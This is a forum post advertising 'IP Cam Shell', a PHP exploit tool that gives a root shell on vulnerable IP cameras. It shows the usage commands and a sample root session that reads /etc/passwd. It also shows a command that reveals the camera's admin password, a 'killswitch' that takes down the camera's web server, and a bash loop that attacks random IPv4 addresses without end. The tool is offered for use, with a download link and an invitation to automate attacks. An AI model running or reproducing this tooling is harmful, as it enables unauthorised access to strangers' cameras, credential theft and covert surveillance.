Jump to content
rukov

IP Cam Shell

By rukov, in Programe utile

Recommended Posts

rukov Newbie

rukov

Posted
Posted

Requirements

PHP 5

A distribution of Linux. I haven’t and won’t test this on Windows.

IP Cam Shell Usage

Using IPCS is pretty straight forward. You pass the URL to ipcs.php via the -u option.

$ php ipcs.php -u http://192.168.0.3:8080

If the camera is vulnerable you’ll be dropped in to a “shell” as root and be able to exploit the camera further.

$ php ipcs.php -u http://192.168.0.3:8080

Those who do not understand UNIX are condemned to reinvent it, poorly. — Henry Spencer

ipcamshell>

It’s very much like being logged in to a stripped down Unix server as root.

ipcamshell> whoami

root

ipcamshell> id

uid=0(root) gid=0(root)

ipcamshell> ls /

bin

dev

etc

lib

linuxrc

mnt

opt

proc

sbin

scripts

tmp

usr

var

ipcamshell> cat /etc/passwd

root:x:0:0:Linux User,,,:/:/bin/sh

Use quit, exit, or ^C to exit.

Further Attacks

Of course it wouldn’t be very fun without the ability to login and view the camera…

ipcamshell> getadminpass

Username: admin

Password: hunter2

If you wish to kill the web server (to prevent someone from accessing the web interface temporarily), run the killswitch command. Note that the camera will continue to record regardless of this. Shutting the server down might switch the camera off, although that’s complete speculation.

If the camera isn’t vulnerable, the server isn’t up, or the internet hates you, you’ll recieve the following message:

Sorry, the server specified isn't vulnerable.

Automation

IPCS has the potential to be automated in different ways. This, I’m going to leave to you. The -coption won’t drop you in to a shell after successfully exploiting a server, and the -g option surpresses the “Sorry, the server specified isn’t vulnerable.” messages for failed attempts.

As an example, the following bash script will forever try to attack randomly generated IPv4 addresses.

#!/bin/bash

while true; do export ip=$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)) && echo "Trying $ip..." && php ipcs.php -c 1 -g 1 -u http://$ip; done;

This is slow, and will likely yield nothing without extremely good luck. Use your imagination.

Download https://github.com/SintheticLabs/ipcamshell

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...